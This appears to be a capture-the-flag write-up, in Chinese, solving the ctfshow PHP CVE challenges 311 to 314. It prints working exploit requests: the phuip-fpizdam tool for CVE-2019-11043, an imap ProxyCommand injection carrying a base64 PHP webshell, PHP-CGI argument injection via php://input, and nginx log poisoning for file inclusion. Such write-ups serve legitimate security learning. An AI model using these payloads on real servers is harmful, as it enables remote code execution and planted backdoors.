ctfshow-phpCVE-311-314

由 admin 发布

311

根据页面给出的 CVE 提示

image-20210113142013410

结合php版本

image-20210113142036993

找到了一篇这样的文章 CVE-2019–11043

利用方法

安装 GO

参考 https://golang.google.cn/doc/install

安装完成后

go get -v github.com/neex/phuip-fpizdam
go install github.com/neex/phuip-fpizdam

进入 image-20210113142252741

image-20210113142325518

image-20210113142353916

得到了 flag 位置

访问就行了

312

image-20210113151938008

先输点东西

image-20210113151925240

根据回显的信息搜索到了

PHP imap 远程命令执行漏洞(CVE-2018-19518)

利用

使用burp 发送以下数据包

POST / HTTP/1.1
Host: f82048f0-a632-4b36-ac52-c0c51f0c138f.chall.ctf.show
Content-Length: 142
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://f82048f0-a632-4b36-ac52-c0c51f0c138f.chall.ctf.show
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: UM_distinctid=174aebe00efb42-08fa5b0ad1bdac-333769-144000-174aebe00f04d9
Connection: close

hostname=x+-oProxyCommand%3decho%09ZWNobyAnPD9waHAgZXZhbCgkX1BPU1RbJ3MnXSk7Pz4nID4geTIyMi5waHA%3D|base64%09-d|sh}a&username=222&password=333

其中 base64 部分为一句话木马

hostname=x+-oProxyCommand%3decho%09一句话木马|base64%09-d|sh}a&username=222&password=333

image-20210113152158209

image-20210113152332176

得到 flag

313

漏洞验证

image-20210113154224758

利用

burp 数据包

POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1
Host: 449c6613-ed1c-4837-bdb2-48d5fba13f57.chall.ctf.show
Content-Length: 28
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://449c6613-ed1c-4837-bdb2-48d5fba13f57.chall.ctf.show
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://449c6613-ed1c-4837-bdb2-48d5fba13f57.chall.ctf.show/index.php?-s
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: UM_distinctid=174aebe00efb42-08fa5b0ad1bdac-333769-144000-174aebe00f04d9
Connection: close

<?php system('ls -al /'); ?>

image-20210113154349417

在根目录下得到了一个目录

目录下包含 flag

image-20210113154448523

314

给出了源代码

<?php

error_reporting(0);

highlight_file(__FILE__);

//phpinfo
$file = $_GET['f'];

if(!preg_match('/\:/',$file)){
    include($file);
}

漏洞验证

image-20210113155220820

可以包含文件

 利用

通过 日志 来写入一句话

image-20210113155307167

使用代码执行来利用漏洞

接下来传入

?f=/var/log/nginx/access.log&s=system(%27ls%20-al%20/%27);

image-20210113155344444

得到flag


暂无评论

发表评论